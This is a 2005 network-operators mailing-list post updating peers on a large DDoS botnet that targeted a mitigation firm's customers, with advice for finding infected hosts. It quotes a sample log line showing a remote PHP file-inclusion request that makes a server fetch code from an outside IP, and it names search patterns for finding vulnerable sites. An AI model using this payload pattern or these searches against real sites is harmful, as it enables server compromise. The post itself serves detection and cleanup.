North American Network Operators Group|
Date Prev | Date Next |
Date Index |
Thread Index |
Author Index |
Re:Destructive botnet originating from Japan
- From: Barrett G. Lyon
- Date: Sat Dec 24 13:45:38 2005
Here is a little update:
As of last night authorities were able to seize the IRC server from
the ISP in Japan and there will be extensive follow-up it. The DDoS
attack is now running headless in the happy range of about 3+ Gbps at
around 7-9M PPS. The bots will continue attacking us until they
receive the stop command from the bot master, there will never be a
stop command, so we will continue to see packet love for a few months
while people find that they are attacking us. We will publish a new
list of the bots on Monday as we idle with this low traffic rate over
The attacker was targeting a couple customers that came into our
environment after other solutions failed to work for them. After
reviewing and comparing notes, it is obvious that the attacks were
assassination attempts from a competitor. There was no extortion
If you want to get the bots off your network, watch flow data
destined to AS32787 with SYN floods to TCP 80 as the destination.
Sites that use a PHP include (without validating the strings) to pull-
up different web sections and pages are at risk, a lot of people are
reporting infection via "$section.php" and "$page.php", the attacker
appears to have used Google to locate sites that use includes in that
fashion (searching "index.php?page=" or "index.php?section=").
Reviewing infected machines for logs related to 220.127.116.11 would be
easy to locate a past infection but may not be reliable if the
attacker starts a new botnet. An example of the log data looks
something like this:
grep 18.104.22.168 access_log
22.214.171.124 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?
section=http%3A//126.96.36.199/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
Happy hunting and have nice holidays!
CTO and founder
Prolexic Technologies, Inc